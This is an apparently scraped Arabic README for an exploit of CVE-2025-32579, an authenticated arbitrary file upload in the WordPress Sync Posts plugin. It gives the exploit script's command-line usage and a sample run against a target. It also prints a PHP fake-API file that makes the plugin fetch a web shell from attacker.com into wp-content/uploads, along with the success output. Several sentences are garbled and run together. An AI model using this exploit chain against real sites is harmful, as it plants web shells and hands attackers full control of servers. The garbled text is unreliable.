
WordPress Sync Posts Plugin <= 1.0 عرضة للرفع التعسفي للملفات
📦 يؤثر على: Sync Posts <= 1.0
🧨 درجة CVSS: 9.9 حرجة
📁 متجه CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
إضافة Sync Posts لووردبريس من إنتاج SoftClever Limited معرّضة لثغرة رفع ملفات غير مقيد تسمح لـالمهاجمين المُصادَق عليهم برفع ملفات PHP عشوائية (مثل شِل الويب) وتنفيذها على الخادم.
website_url الذي يعيد منشورات JSON.wp-content/uploads.يقوم سكربت الاستغلال بأتمتة السلسلة الكاملة:
<img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">website_url خبيث إلى admin-ajax.php?action=sync_posts/uploads/usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL
Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://target.com/wordpress)
-un, --username USERNAME
Username to login
-p, --password PASSWORD
Password to login
-ws, --website WEBSITE
URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
-shell, --webshell WEBSHELL
Web shell URL used inside the fake API (can be a test image)
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
| الخيار | الوصف |
|---|---|
-u, --url | عنوان URL المستهدف لووردبريس |
-un, --username | اسم مستخدم ووردبريس (admin) |
-p, --password | كلمة مرور ووردبريس |
-ws, --website | رابط ملف PHP الخبيث الذي يعيد JSON لمنشور وهمي |
-shell, --webshell | ملف الشِل الفعلي الذي سيتم حقنه عبر `` |
يمكنك أيضًا استخدام صورة وهمية بدلًا من شِل حقيقي للاختبار:
--webshell https://via.placeholder.com/1x1.jpg
هذه هي الاستجابة التي يعيدها Khaled_alenazi.php:
<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src="http://attacker.com/shell.php">"
]
]
]);
?>
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
"success": true,
"data": {
"message": "Posts imported successfully",
...
}
}
shell.phpwp-content/uploads/2025/04/shell.phpwebsite_url إلى نطاقات داخلية أو مضيفات مدرجة في القائمة البيضاءCVE: CVE-2025-32579
الاستغلال بواسطة Nxploited (Khaled Alenazi)